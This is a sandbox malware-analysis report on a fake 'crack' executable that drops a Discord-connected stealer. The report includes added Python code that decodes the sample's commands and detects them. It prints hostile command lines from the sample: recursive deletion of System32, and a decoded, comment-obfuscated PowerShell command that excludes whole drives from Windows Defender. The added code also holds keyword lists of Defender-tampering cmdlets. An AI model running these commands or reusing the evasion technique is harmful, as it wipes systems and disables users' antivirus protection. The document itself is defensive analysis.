File name:

lcb_spoof_crack.exe

Full analysis: https://app.any.run/tasks/91cf3a5a-b14d-45be-a0fd-6e06970d5082
Verdict: Malicious activity
Threats:

Stealers are a class of malware built to gain unauthorized access to a user's information and hand it to the attacker. The category covers programs that each target a particular kind of data, such as files, saved passwords, and cryptocurrency. Many stealers also spy on their victims by logging keystrokes and taking screenshots. They are distributed mainly through phishing campaigns, and, as in this sample, through fake "cracks" for commercial software.

Analysis date: March 24, 2025, 19:01:51
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
discord
exfiltration
stealer
evasion
github
susp-powershell
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, 4 sections
MD5:

EE5136686EE07730BC08F8143FBE048C

SHA1:

82B5109F402DF793B4CC1712A1709330EAA72208

SHA256:

355F58C2B357F9718038DEAE8E6F2A1E7C35C0D60153A169A7D736EC4F6E5CCA

SSDEEP:

98304:nNIxUKJFgx4Fdmfl2oSKE5ry9KNMoeyhBFY7eRP/u4aEik9w6Vm88nD6rzVOhXkD:cK991UxLWvoIujryzA0sj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Actions look like stealing of personal data

      • X Worm Nuker.exe (PID: 7248)
  • SUSPICIOUS

    • Reads security settings of Internet Explorer

      • lcb_spoof_crack.exe (PID: 4300)
    • BASE64 encoded PowerShell command has been detected

      • lcb_spoof_crack.exe (PID: 4300)
    • Checks for external IP

      • X Worm Nuker.exe (PID: 7248)
    • The process connected to a server suspected of theft

      • X Worm Nuker.exe (PID: 7248)
    • Starts POWERSHELL.EXE for commands execution

      • lcb_spoof_crack.exe (PID: 4300)
    • Starts CMD.EXE for commands execution

      • X Worm Nuker.exe (PID: 7248)
    • Base64-obfuscated command line is found

      • lcb_spoof_crack.exe (PID: 4300)
    • Executable content was dropped or overwritten

      • lcb_spoof_crack.exe (PID: 4300)
  • INFO

    • Reads the computer name

      • lcb_spoof_crack.exe (PID: 4300)
      • X Worm Nuker.exe (PID: 7248)
    • Checks supported languages

      • X Worm Nuker.exe (PID: 7248)
      • lcb_spoof_crack.exe (PID: 4300)
    • Disables trace logs

      • X Worm Nuker.exe (PID: 7248)
    • Reads the software policy settings

      • X Worm Nuker.exe (PID: 7248)
    • Creates files in a temporary directory

      • lcb_spoof_crack.exe (PID: 4300)
    • Checks proxy server information

      • X Worm Nuker.exe (PID: 7248)
      • BackgroundTransferHost.exe (PID: 516)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4812)
    • Reads Environment values

      • X Worm Nuker.exe (PID: 7248)
    • Found Base64 encoded access to Windows Defender via PowerShell (YARA)

      • powershell.exe (PID: 4812)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 4812)
    • Process checks computer location settings

      • lcb_spoof_crack.exe (PID: 4300)
    • Attempting to use instant messaging service

      • X Worm Nuker.exe (PID: 7248)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 516)
      • BackgroundTransferHost.exe (PID: 208)
    • Reads the machine GUID from the registry

      • X Worm Nuker.exe (PID: 7248)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 516)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (61.6)
.dll | Win32 Dynamic Link Library (generic) (14.6)
.exe | Win32 Executable (generic) (10)
.exe | Win16/32 Executable Delphi generic (4.6)
.exe | Generic Win/DOS Executable (4.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 0000:00:00 00:00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit, No debug
PEType: PE32
LinkerVersion: 6
CodeSize: 2048
InitializedDataSize: 8039936
UninitializedDataSize: -
EntryPoint: 0x14d1
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes
153
Monitored processes
17
Malicious processes
2
Suspicious processes
0

Behavior graph

Process tree as shown in the graph (17 monitored processes; "no specs" means ANY.RUN attached no indicators to that process):
  • lcb_spoof_crack.exe (start)
  • powershell.exe (no specs)
  • conhost.exe (no specs)
  • lcb_spoof_crack.exe (no specs)
  • X Worm Nuker.exe
  • sppextcomobj.exe (no specs)
  • slui.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • backgroundtransferhost.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • cmd.exe (no specs)
  • conhost.exe (no specs)
  • lcb_spoof_crack.exe (no specs)

Process information

PID:
208
CMD:
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path:
C:\Windows\System32\BackgroundTransferHost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID:
516
CMD:
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path:
C:\Windows\System32\BackgroundTransferHost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID:
960
CMD:
"cmd.exe" /C rd /s /q C:\Windows\System32
Path:
C:\Windows\System32\cmd.exe
Parent process:
X Worm Nuker.exe
Note: this is a destructive command (recursive, silent removal of the System32 directory) issued from an elevated shell, i.e. wiper-style behaviour rather than data theft. Even at HIGH integrity most of System32 survives, because files that are in use cannot be deleted and the directory is owned by TrustedInstaller with no delete rights for Administrators, but the attempt can still cripple the installation.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID:
1180
CMD:
"cmd.exe" /C Remove-Item -Path C:\Windows\System32 -Recurse -Force
Path:
C:\Windows\System32\cmd.exe
Parent process:
X Worm Nuker.exe
Note: Remove-Item is a PowerShell cmdlet, not a cmd.exe command, so cmd.exe cannot execute this line as written; the rd /s /q attempt in PID 960 is the one that can do damage.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
PID:
2096
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID:
4300
CMD:
"C:\Users\admin\Desktop\lcb_spoof_crack.exe"
Path:
C:\Users\admin\Desktop\lcb_spoof_crack.exe
Parent process:
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\desktop\lcb_spoof_crack.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
4812
CMD:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAdgBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAegBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGUAbQB2ACMAPgA="
Path:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process:
lcb_spoof_crack.exe
Note: the command line names the System32 PowerShell, but the process ran from SysWOW64 because the parent (PID 4300) is a 32-bit process and WOW64 file-system redirection maps System32 to SysWOW64 for it. The -EncodedCommand value is the script as UTF-16LE, base64-encoded; it decodes to
<#jvn#>Add-MpPreference <#jza#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#eju#> -Force <#emv#>
i.e. a single Add-MpPreference call that adds the whole user profile and the whole system drive to Windows Defender's exclusion list, with short <# ... #> block comments wedged between the tokens so the plain-text command never appears as one string. The exit code of 1 and the "Script raised an exception" signature suggest the call did not complete in this run.
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID:
5116
CMD:
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path:
C:\Windows\System32\BackgroundTransferHost.exe
Parent process:
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID:
5376
CMD:
"C:\Users\admin\Desktop\lcb_spoof_crack.exe"
Path:
C:\Users\admin\Desktop\lcb_spoof_crack.exe
Parent process:
explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED: this medium-integrity launch needed UAC elevation; the elevated instance is PID 4300, which runs at HIGH integrity)
Modules
Images
c:\users\admin\desktop\lcb_spoof_crack.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
PID:
6032
CMD:
\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path:
C:\Windows\System32\conhost.exe
Parent process:
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
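To see what PID 4812 was told to run, decode the -EncodedCommand argument: it is the script as UTF-16LE, base64-encoded. The example below is added here and is not ANY.RUN's code or the sample's; it decodes the exact string from this report, strips the <# ... #> block comments the sample wedges between tokens to defeat simple string matching, and flags the Windows Defender tampering that the normalised command reveals. The DEFENDER_TAMPERING keyword list is this example's own choice, although every cmdlet and parameter in it is real.

```python
import base64
import re

# The -EncodedCommand argument exactly as captured for powershell.exe (PID 4812)
# in this report, split across lines only for readability.
ENCODED_COMMAND = (
    "PAAjAGoAdgBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"
    "PAAjAGoAegBhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAA"
    "KAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMA"
    "eQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAagB1ACMAPgAgAC0ARgBvAHIA"
    "YwBlACAAPAAjAGUAbQB2ACMAPgA="
)

# PowerShell block comments <# ... #>. The sample inserts short random ones
# between tokens so the plain-text command never exists as one string.
BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)

# Defender-tampering vocabulary to match after normalisation. These are real
# Defender cmdlets and parameters; which ones to list is this example's choice.
DEFENDER_TAMPERING = (
    "Add-MpPreference",
    "Set-MpPreference",
    "Remove-MpPreference",
    "-ExclusionPath",
    "-ExclusionProcess",
    "-ExclusionExtension",
    "-DisableRealtimeMonitoring",
    "-DisableBehaviorMonitoring",
    "-DisableIOAVProtection",
)


def decode_encoded_command(b64: str) -> str:
    """powershell.exe -EncodedCommand takes the script base64-encoded as UTF-16LE."""
    return base64.b64decode(b64).decode("utf-16-le")


def normalise(script: str) -> str:
    """Drop block comments and collapse whitespace so keyword matching is stable."""
    return " ".join(BLOCK_COMMENT.sub(" ", script).split())


def defender_tampering_hits(script: str) -> list[str]:
    """Case-insensitive match (PowerShell is case-insensitive) of tampering tokens."""
    lowered = normalise(script).lower()
    return [t for t in DEFENDER_TAMPERING if t.lower() in lowered]


def exclusion_paths(script: str) -> list[str]:
    """Pull the path list out of '-ExclusionPath @(a,b)' or '-ExclusionPath a'."""
    m = re.search(r"-ExclusionPath\s+(?:@\(([^)]*)\)|(\S+))", normalise(script), re.IGNORECASE)
    if not m:
        return []
    raw = m.group(1) if m.group(1) is not None else m.group(2)
    return [p.strip().strip("\"'") for p in raw.split(",") if p.strip()]


def triage(b64: str) -> dict:
    """One-call summary of an encoded command: decoded text, normalised text, findings."""
    script = decode_encoded_command(b64)
    return {
        "decoded": script,
        "normalised": normalise(script),
        "tampering": defender_tampering_hits(script),
        "exclusions": exclusion_paths(script),
    }


if __name__ == "__main__":
    for key, value in triage(ENCODED_COMMAND).items():
        print(f"{key}: {value}")
```

The normalised result is one Add-MpPreference call that excludes $env:UserProfile and $env:SystemDrive, which covers every path the sample touches afterwards (the Desktop lure, the %TEMP% drop, and System32). Matching on the normalised text rather than the raw command line is what keeps the rule robust against the comment padding; a simple substring check for "Add-MpPreference" on the raw base64 would never fire.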
Total events
8 675
Read events
8 646
Write events
29
Delete events
0
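The process table above, expressed as detection logic. This is an added example in Python, not ANY.RUN's code or the sample's: it replays constructed process-creation events built from this report's PIDs, command lines, paths, parents and integrity levels (the full path of explorer.exe, and that PID 7248 was started by PID 4300, which dropped it, are assumptions; the -EncodedCommand payload is truncated to its first 64 characters) and applies four rules a practitioner would want from this tree: destructive deletion of System32 from a shell, encoded PowerShell launched by a binary in a user-writable location, shells spawned from %TEMP%, and executables running from %TEMP%.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str
    parent_image: str   # full path of the parent
    integrity: str


# Constructed process-creation events built from this report's process table.
# Assumptions: explorer.exe's full path, and PID 4300 as the parent of PID 7248.
EVENTS = [
    ProcEvent(4300, r"C:\Users\admin\Desktop\lcb_spoof_crack.exe",
              r'"C:\Users\admin\Desktop\lcb_spoof_crack.exe"',
              r"C:\Windows\explorer.exe", "HIGH"),
    ProcEvent(4812, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand '
              r'"PAAjAGoAdgBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAA"',
              r"C:\Users\admin\Desktop\lcb_spoof_crack.exe", "HIGH"),
    ProcEvent(7248, r"C:\Users\admin\AppData\Local\Temp\X Worm Nuker.exe",
              r'"C:\Users\admin\AppData\Local\Temp\X Worm Nuker.exe"',
              r"C:\Users\admin\Desktop\lcb_spoof_crack.exe", "HIGH"),
    ProcEvent(960, r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C rd /s /q C:\Windows\System32',
              r"C:\Users\admin\AppData\Local\Temp\X Worm Nuker.exe", "HIGH"),
    ProcEvent(1180, r"C:\Windows\System32\cmd.exe",
              r'"cmd.exe" /C Remove-Item -Path C:\Windows\System32 -Recurse -Force',
              r"C:\Users\admin\AppData\Local\Temp\X Worm Nuker.exe", "HIGH"),
    ProcEvent(516, r"C:\Windows\System32\BackgroundTransferHost.exe",
              r'"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1',
              r"C:\Windows\System32\svchost.exe", "MEDIUM"),
]

USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(?:Desktop|Downloads|AppData)\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
SYSTEM32_TARGET = re.compile(r'\\Windows\\System32(?:\\|\s|"|$)', re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_encoded_command(cmdline: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    for tok in cmdline.split():
        if tok.startswith("-") and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return True
    return False


def is_destructive_system32(cmdline: str) -> bool:
    """rd/rmdir with /s, or Remove-Item -Recurse, aimed at the System32 directory."""
    if not SYSTEM32_TARGET.search(cmdline):
        return False
    lowered = cmdline.lower()
    return bool(re.search(r"\b(?:rd|rmdir)\b.*\s/s\b", lowered)
                or re.search(r"\bremove-item\b.*-recurse\b", lowered))


def evaluate(events) -> dict:
    """Return {pid: sorted rule names} for every event that trips at least one rule."""
    hits = {}
    for ev in events:
        rules = []
        image = basename(ev.image)
        if is_destructive_system32(ev.cmdline):
            rules.append("destructive_system32")
        if image in SHELLS and has_encoded_command(ev.cmdline) and USER_WRITABLE.search(ev.parent_image):
            rules.append("encoded_powershell_from_user_path")
        if image in SHELLS and TEMP_DIR.search(ev.parent_image):
            rules.append("shell_spawned_from_temp")
        if TEMP_DIR.search(ev.image):
            rules.append("executable_running_from_temp")
        if rules:
            hits[ev.pid] = sorted(rules)
    return hits


if __name__ == "__main__":
    for pid, rules in evaluate(EVENTS).items():
        print(pid, rules)
```

Two design points carry over to real telemetry: match the parent's full image path, not its name, because the lure and the drop are only distinguishable from legitimate software by where they live; and key the encoded-PowerShell rule on the switch rather than on the payload, since the base64 changes with every build while -EncodedCommand (or any prefix of it) does not. The System32 rule also fires on the Remove-Item variant even though cmd.exe cannot run it; intent is what you want to alert on.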

Modification events

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: FileTracingMask
Value:

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: ConsoleTracingMask
Value:

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: MaxFileSize
Value: 1048576

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASAPI32
Operation: write
Name: FileDirectory
Value: %windir%\tracing

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASMANCS
Operation: write
Name: EnableFileTracing
Value: 0

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASMANCS
Operation: write
Name: EnableAutoFileTracing
Value: 0

(PID) Process: (7248) X Worm Nuker.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\X Worm Nuker_RASMANCS
Operation: write
Name: EnableConsoleTracing
Value: 0

Note: the Tracing\<image>_RASAPI32 and _RASMANCS keys are created automatically the first time a process uses the RAS/WinINet networking APIs, and the zero values are the defaults. The "Disables trace logs" signature above therefore reflects ordinary network activity (the Discord connections), not deliberate log tampering.
Executable files
2
Suspicious files
6
Text files
4
Unknown types
0

Dropped files

PID: 516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4a2fb966-37c5-4149-a6d1-8eea4b406c3f.down_data
Type:
MD5:
SHA256:

PID: 4812
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xqlwu3ox.2dx.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4812
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1cvgp224.1ua.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 4812
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kgz5s3ez.tb5.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
Type: binary
MD5: FAA1D57DDED14C2A8C34B989979E74D9
SHA256: 64FE2AB62FF8BA96791DA1E5E87A400E7504DC9945F28765A80DDC7BB827EA61

PID: 516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D
Type: binary
MD5: 4872BABAF39AA62B8D32695EBB7E9173
SHA256: 2EE85DF86EE29BBEB3DCA81AA29B6DE204F605A2769B84C728A329178A2D0999

PID: 516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3e4c4be9-f26a-4683-868d-be3bcb16a8ea.up_meta_secure
Type: binary
MD5: 62D4A5ED1B61EC4885F7B11BFA1927EE
SHA256: 37DF9A30222BC015ED47925E7DE767DCF9009ACCF5427DA14C7D4EE5B4E82682

PID: 4300
Process: lcb_spoof_crack.exe
Filename: C:\Users\admin\AppData\Local\Temp\X Worm Nuker.exe
Type: executable
MD5: 741BBF579E6686AB87F9674D1F4B264D
SHA256: B4B2027DFD94A35C2BCF371ABCA1F16E3C10100B719DF65EC0CBE4D534770881

PID: 516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\3e4c4be9-f26a-4683-868d-be3bcb16a8ea.300c1d4a-261b-4e1a-b283-e71f7dd785ea.down_meta
Type: binary
MD5: 149A84572D196DB653E09D4B46194767
SHA256: 4C929DFCE10A3723077F871486C00031B081F568DD4D5EC128DB03143B568F7D

PID: 516
Process: BackgroundTransferHost.exe
Filename: C:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\4a2fb966-37c5-4149-a6d1-8eea4b406c3f.300c1d4a-261b-4e1a-b283-e71f7dd785ea.down_meta
Type: binary
MD5: 149A84572D196DB653E09D4B46194767
SHA256: 4C929DFCE10A3723077F871486C00031B081F568DD4D5EC128DB03143B568F7D

Note: the only file written by the sample itself is the executable dropped to %TEMP% by PID 4300, X Worm Nuker.exe (MD5 741BBF579E6686AB87F9674D1F4B264D), which is the process behind every stealer and network indicator above. The three __PSScriptPolicyTest_*.ps1/.psm1 files (identical hashes) are created by PowerShell on every start to probe script-execution policy and are not malware artifacts; the BackgroundTransferHost.exe files are Windows content-delivery and certificate-cache housekeeping.
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
53
DNS requests
17
Threats
16

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.48.23.141:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
516 | BackgroundTransferHost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
7212 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
7212 | SIHClient.exe | GET | 200 | 23.219.150.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
7388 | backgroundTaskHost.exe | GET | 200 | 23.54.109.203:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted

All six plain-HTTP requests are certificate revocation checks (CRL and OCSP fetches) made by Windows components, not by the sample. The sample's own network activity is the TLS traffic to Discord listed under Connections, so there is no HTTP content to inspect here; the PCAP is needed for the TLS metadata.

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 51.124.78.146:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
5496 | MoUsoCoreWorker.exe | 23.48.23.141:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
6652 | RUXIMICS.exe | 51.124.78.146:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
7248 | X Worm Nuker.exe | 162.159.135.234:443 | gateway.discord.gg | CLOUDFLARENET | - | whitelisted
